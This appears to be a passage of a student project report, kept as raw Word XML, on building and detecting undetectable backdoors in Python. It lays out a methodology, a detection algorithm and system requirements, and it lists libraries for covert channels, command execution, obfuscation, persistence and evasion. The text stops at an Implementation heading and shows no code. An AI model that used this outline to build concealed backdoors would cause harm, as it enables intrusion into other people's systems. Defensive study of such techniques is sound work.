      </w:pP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This study employs a multi-faceted approach to investigate and mitigate undetectable backdoors in Python applications. The key components are as follows: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1. Literature Review:</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Understand existing research on backdoors, concealment techniques, and detection strategies.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Process: Review academic papers, industry reports, and case studies.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Synthesis of current knowledge to inform experimental analysis.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2. Experimental Analysis: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Empirically examine concealment techniques.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Process: Develop Python applications with embedded backdoors using identified techniques. Test these backdoors with security tools (static analysis, antivirus, network monitoring).</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Data on effectiveness of concealment methods and limitations of current detection tools.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3. Analysis of Evasion Techniques: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Identify how backdoors evade detection and determine indicators of compromise (IoCs).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Process: Analyze backdoor behavior during execution.</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List of IoCs and behavioral patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="821"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1605" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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4. Development of Detection and Mitigation Strategies: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Propose and test new detection strategies.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Process: Develop advanced techniques (enhanced static analysis, machine learning models, network traffic analysis). Test and refine these strategies.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Validated detection and mitigation strategies.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5. Practical Evaluation and Case Studies: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Apply strategies in real-world scenarios.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Process: Analyze case studies and implement detection strategies in practical environments.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Insights and validation from real-world applications.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6. Dissemination and Awareress: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Objective: Raise awareness among developers and cybersecurity professionals.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Process: Create educational resources and conduct workshops.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   - Outcome: Increased awareness and adoption of secure coding practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="821"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="362" w:line="290" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1605" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This methodology aims to provide a comprehensive understanding of undetectable backdoors in Python applications and develop effective strategies for their detection and mitigation. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="61"/>
        <w:ind w:left="3198" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Algorithm for Detecting and Mitigating Undetectable Python Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="821"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1518" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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1. Initialization:</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Set up tools for static analysis, dynamic analysis, and network monitoring.</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2. Code Analysis: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Static Analysis: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Parse code and log imports.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Scan for obfuscated code, unusual eval/exec use, and hidden imports.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Flag encrypted/encoded code segments.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*Dynamic Analysis:*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Execute in a sandbox.</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Monitor system calls, file operations, and network communications.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Identify anomalies like unexpected connections or resource usage.</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3. Behavioral Analysis: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Collect runtime data.</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Use machine learning to detect anomalies.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Compare against known good behaviors to find deviations.</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4. Network Traffic Analysis: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Monitor all network traffic.</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Identify patterns of covert communication.</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Cross-reference with known IoCs.</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5. Indicators of Compromise (IoCs):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Compile and validate IoCs from analysis.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Update detection rules and models.</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6. Mitigation Strategy:</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Isolate affected environment.</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Apply patches or remove malicious code.</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Enhance security measures (e.g., strict code reviews, runtime monitoring, IDS).</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7. Continuous Monitoring:</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Set up tools for ongoing monitoring of behavior and traffic.</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Regularly update detection algorithms and IoCs.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Conduct periodic audits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:right="1518"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8. Documentation and Awareness:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="821"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1518" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Document findings and methods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="821"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="314" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1518" w:firstLine="0"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId19"/>
          <w:footerReference w:type="default" r:id="rId20"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Create educational materials and conduct training sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="76" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HARDWARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="92"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:ind w:left="78" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SPECIFICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="316"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>Apple M1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:ind w:left="83" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MEMORY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SPECIFICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="317"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>LPDDR4X SDRAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:footerReference w:type="default" r:id="rId22"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="1901" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOFTWARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="92"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:spacing w:line="319" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OPERATING SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mac M1 2020</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:spacing w:line="319" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOFTWARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PACKS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>NEEDED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="1526"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pycharam community -2024.1.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:right="1526"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali linux2024.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="48"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:rPr>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>FRAMEWORKS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LIBRARIES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:t>USED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Core Libraries:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - socket: Establish covert communication channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - subprocess: Execute system commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Code Obfuscation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - pyminifier: Obfuscate Python code to make it harder to detect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - pyarmor: Protect scripts from reverse engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Persistence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - pyinstaller: Package scripts into executables for persistent deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Covert Communication:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - requests: Send and receive data covertly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - cryptography: Encrypt communications to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Evasion Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - ctypes: Call low-level system functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - os: Interact with the operating system to hide activities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="44"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId23"/>
          <w:footerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These tools and techniques help create Python backdoors that are difficult to detect by traditional security measures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="2737" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPLEMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="252"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
